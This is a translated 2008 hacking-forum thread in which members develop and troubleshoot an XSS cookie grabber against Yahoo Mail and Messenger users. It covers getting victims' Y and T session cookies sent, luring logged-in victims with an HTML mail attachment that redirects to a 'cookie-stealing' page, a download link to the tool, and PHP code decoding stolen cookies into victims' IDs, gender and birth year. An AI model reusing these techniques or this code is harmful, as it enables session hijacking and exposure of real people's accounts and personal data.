Guest Nemessis Posted January 7, 2008
http://rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst

lucian Posted January 7, 2008
> Does anyone know, though, why Y and T don't come through as well?
On IE6, Y and T don't always come through .... try ticking "Keep me signed in .." in Yahoo Mail and run a test on your own computer ... you'll see that it works ... I ran into this problem the first time I used the grabber .... it worked very well on Mozilla but not on IE6 .... it simply doesn't work on some computers ...

Danny Posted January 7, 2008
EDIT: Done.. I got to the bottom of it ... the problem is as follows .. when you click in Messenger and it opens with Mozilla, it sends the cookie directly with Y and T (without being logged in on the Yahoo site). When you click the link, also in Messenger, but it opens with IE, it sends all sorts of junk, but without Y and T. So I logged in on the Yahoo site, then closed the site and clicked the link in Messenger again and, surprise, Y and T came through too! So what I would need to do now to make it work on IE as well is to catch the victim logged in... how do I do that? Back to the old method, I send mail ...
Now I have a question .. can an HTML page be made ... then sent by mail as an attachment, so that when they open the mail it redirects straight to my cookie-"stealing" page?

BlaCkIcE Posted January 9, 2008
Super cool, TEAM. Keep it up, and more of the same :wink:

andrewboy Posted January 9, 2008
I thought I'd try modifying the script a bit........ I'm waiting for the opinions of those who made the original script, to tell me whether what I did is faster in execution than the original script (at least in theory, in my opinion, it is) or not.. ;)
Link: http://www.speedyshare.com/829403847.html
I hope you don't mind that I did this...

Guest Nemessis Posted January 9, 2008
Please post a screenshot too, andrewboy, if there are improvements visible to the naked eye. We really do ask you all to try to improve the script and to share your results with us.

andrewboy Posted January 9, 2008

    function GetID ($Name) {
        // Substitution table: encoded character => plain character
        $char = array (
            "a" => "k", "b" => "l", "c" => "m", "d" => "n", "e" => "o", "f" => "p",
            "g" => "q", "h" => "r", "i" => "s", "j" => "t", "k" => "u", "l" => "v",
            "m" => "w", "n" => "x", "o" => "y", "p" => "z", "q" => "0", "r" => "1",
            "s" => "2", "t" => "3", "u" => "4", "v" => "5", "w" => "7", "x" => "8",
            "y" => "9", "z" => "6", "0" => "a", "1" => "b", "2" => "c", "3" => "d",
            "4" => "e", "5" => "f", "6" => "g", "7" => "h", "8" => "i", "9" => "j");
        while (list ($enc, $plain) = each ($char)) {
            $Name = str_replace($enc, $plain, $Name);
        }
        return $Name;
    }

    function GetYear($Year) {
        // Lookup table: two-character code => birth year
        $Years = array (
            "00" => "1900", "01" => "1901", "02" => "1902", "03" => "1903", "04" => "1904", "05" => "1905", "06" => "1906", "07" => "1907",
            "08" => "1908", "09" => "1909", "0a" => "1910", "0b" => "1911", "0c" => "1912", "0d" => "1913", "0e" => "1914", "0f" => "1915",
            "0g" => "1916", "0h" => "1917", "0i" => "1918", "0j" => "1919", "0k" => "1920", "0l" => "1921", "0m" => "1922", "0n" => "1923",
            "0o" => "1924", "0p" => "1925", "0q" => "1926", "0r" => "1927", "0s" => "1928", "0t" => "1929", "0u" => "1930", "0v" => "1931",
            "10" => "1932", "11" => "1933", "12" => "1934", "13" => "1935", "14" => "1936", "15" => "1937", "16" => "1938", "17" => "1939",
            "18" => "1940", "19" => "1941", "1a" => "1942", "1b" => "1943", "1c" => "1944", "1d" => "1945", "1e" => "1946", "1f" => "1947",
            "1g" => "1948", "1h" => "1949", "1i" => "1950", "1j" => "1951", "1k" => "1952", "1l" => "1953", "1m" => "1954", "1n" => "1955",
            "1o" => "1956", "1p" => "1957", "1q" => "1958", "1r" => "1959", "1s" => "1960", "1t" => "1961", "1u" => "1962", "1v" => "1963",
            "20" => "1964", "21" => "1965", "22" => "1966", "23" => "1967", "24" => "1968", "25" => "1969", "26" => "1970", "27" => "1971",
            "28" => "1972", "29" => "1973", "2a" => "1974", "2b" => "1975", "2c" => "1976", "2d" => "1977", "2e" => "1978", "2f" => "1979",
            "2g" => "1980", "2h" => "1981", "2i" => "1982", "2j" => "1983", "2k" => "1984", "2l" => "1985", "2m" => "1986", "2n" => "1987",
            "2o" => "1988", "2p" => "1989", "2q" => "1990", "2r" => "1991", "2s" => "1992", "2t" => "1993", "2u" => "1994", "2v" => "1995",
            "30" => "1996", "31" => "1997", "32" => "1998", "33" => "1999", "34" => "2000", "35" => "2001", "36" => "2002", "37" => "2003",
            "38" => "WTF this motherfucker is less than 4 years old",
            "39" => "WTF this motherfucker is less than 3 years old",
            "3a" => "WTF this motherfucker is less than 2 years old",
            "3b" => "WTF this motherfucker is less than 1 years old",
            "3c" => "WTF this motherfucker is not born",
        );
        while (list($cr, $YearX) = each($Years)) {
            if ($Year == $cr) return $YearX;
        }
    }

These two functions were written by me and they find the name and the year; I'd like to know whether there will really be any visible change in the page loading speed (assuming the script is hosted on a weak host)!! I'll try to make these functions even more efficient... but I'm in a hurry (leaving)!
Edit: is it possible to use regular expressions in this case? Something like

    $string=trim( ereg_replace( "[^a-z0-9]", " ", $string ) );

but I have no idea how I could write the regular expression so that, when one of the characters "[^a-z0-9]" is used, it replaces it with the character corresponding to each letter/digit in the expression (sorry for the wording)

tw8 Posted January 9, 2008
> but I have no idea how I could write the regular expression so that, when one of the characters "[^a-z0-9]" is used, it replaces it with the character corresponding to each letter/digit in the expression (sorry for the wording)
That's no big deal. This exists.
As for your improvement ... it's no big deal. I've made much better improvements (I use neither arrays nor so many ifs for the birth year and nick), and, if Nemessis and BanKai want, I'll give them my script to make the 3rd version of the grabber.

andrewboy Posted January 9, 2008
tw8, I didn't ask you what you did.... and if you had taken a quick look at the code you'd have seen that I did the same thing.., at least in the first function.... look first and then talk.... show me that improved code too? I mean, why don't you post it? The credit will go to you anyway if it gets used :D

tw8 Posted January 9, 2008
> tw8, I didn't ask you what you did.... and if you had taken a quick look at the code you'd have seen that I did the same thing.., at least in the first function.... look first and then talk.... show me that improved code too? I mean, why don't you post it? The credit will go to you anyway if it gets used :D
I'll post it right away; I have to test it first and I can't find decent hosting. When I post it, I expect you to take back your insults.

Guest Nemessis Posted January 9, 2008
tw8, post the source and stop commenting.

tw8 Posted January 9, 2008
> tw8, post the source and stop commenting.
Ok. I haven't had the chance to test it, but based on a few mathematical observations, I arrived at this code (this finds the id + the birth year):

    //kw3rln
    $aux=$Y;
    $aux=explode('l=', $aux, -1);
    $aux=explode('/o', $aux[1], -1);
    $aux=$aux[0];
    $id = '';
    for ($i=0; $i<strlen($aux); $i++) {
        $ascii = ord($aux{$i});
        $c = $aux{$i};
        if ($ascii>=48 && $ascii<=57){$c=chr($ascii+49);}
        elseif ($ascii>=97 && $ascii<=112){$c=chr($ascii+10);}
        elseif ($ascii>=113 && $ascii<=122){$c = chr($ascii-65);}
        elseif ($ascii==43){$c = chr(32);}
        $id = $id . $c;
    }
    $id = htmlspecialchars($id);
    // end kw3rln
    // start BanKai
    $aux = explode('&p=', $cookie);
    $aux = $aux[1];
    $aux = explode('&', $aux);
    $aux = $aux[0];
    if ($aux{0} == 'm'){$gender = 'MALE';}
    elseif ($aux{0} == 'f'){$gender = 'FEMALE';}
    else{$gender = '#ERROR';}
    if (ord($aux{1})>=48 && ord($aux{1})<=51) {
        if(ord($aux{2}) >= 48 && ord($aux{2})<=57){$year = 1900 + $aux{1}.$aux{2} + 22 * (ord($aux{1})-48);}
        elseif(ord($aux{2})>=97 && ord($aux{2})<=118){$year = 1900 + 22 * (ord($aux{1})-48) + ord($aux{2}) - 87 + 10 * (ord($aux{1})-48);}
        else{$year = '#ERROR';}
    }
    else {$year = '#ERROR';}

It should work perfectly; if you want, you can test it. Of course, you'll have to make a few changes to the $html variable, because $buni becomes $id in my script.
Now, andrewboy, compare your junk with my script.
Later edit: I changed something. Try it now.

andrewboy Posted January 9, 2008
Well, what can I say... it's better than mine, I haven't tested it..... well done..... I don't know if you'd be interested, but I had been thinking of the same thing (I mean the mathematical observations) and was getting ready to put it into practice, but there's no point anymore... congratulations.. ;)..... you could have put it more nicely about my script :)) ... if you've managed to do something, I don't think you need to brag like that :D ;) ... my opinion, and I didn't say anything to you earlier in a bad way; if it seemed so to you, so be it..

lucian Posted January 10, 2008

    ...
    while (list($cr,$YearX) = each($Years) {if ($Year = $cr) return $YearX; }
    ...
    if ($Year == $cr) return $YearX;

you compare, you don't assign

andrewboy Posted January 10, 2008
sorry, I missed that :D ;) ... thanks for pointing it out ;))

hirosima Posted January 19, 2008
Could you post the link once more? For me at least it doesn't work; it would be better if it were on another server. Thanks in advance.

MaHaReT Posted January 19, 2008
Issues
Some ISPs intentionally block sharing sites like RapidShare to make better use of bandwidth.
On 19 January 2007, news broke that German collections agency GEMA had claimed to have won a temporary injunction against both RapidShare.de and RapidShare.com. "The latter is said to have used copyright protected works of GEMA members in an unlawful fashion,".[4] To date RapidShare has claimed not to have any knowledge of the content uploaded by the users and of not being in a position to control the content. Through its injunctions the District Court in Cologne had now however made it clear to the company that the fact that it was the users and not the operator of the services that uploaded the content onto the sites did not, from a legal point of view, lessen the operator’s liability for copyright infringements that occurred within the context of the services, the spokesman added.
Source: http://en.wikipedia.org/wiki/RapidShare
That's why the link doesn't work.
It's back up.

hirosima Posted January 20, 2008
Could you please put it on another host? Thank you very much.

raz3k Posted January 20, 2008
It works; at least for me it wasn't working because ARP spoofing was in full swing, caused by a virus that acts through iframes... well done to those who racked their brains over XSS and gave birth to this code. We're eagerly awaiting hi5 XSSes that work.

GoodKat Posted January 24, 2008
Good shit! Bravo RST! :twisted:

raz3k Posted January 25, 2008
The XSS in google_adsense.php doesn't work anymore ... it no longer loads the JS. The guys at Yahoo caught on... We're waiting eagerly and with open arms for a working XSS to put into google_adsense.php.
BTW: you did a good job with this toy, congratulations to the whole team!

Guest Nemessis Posted January 25, 2008
It still works perfectly. You made a mistake somewhere. Tested 20 seconds ago.

raz3k Posted January 26, 2008
Yep, a thousand apologies, it works like a charm; yesterday it was acting up. Sorry for the misinformation.

raz3k Posted January 27, 2008
I don't know if it's an isolated case, whether it only happens to me or Yahoo is making changes, but right now the link ht tp://add.yahoo.com/fast/change ... doesn't work for me; in fact ht tp://add.yahoo.com/ doesn't work either. Does it work for you, or am I being paranoid?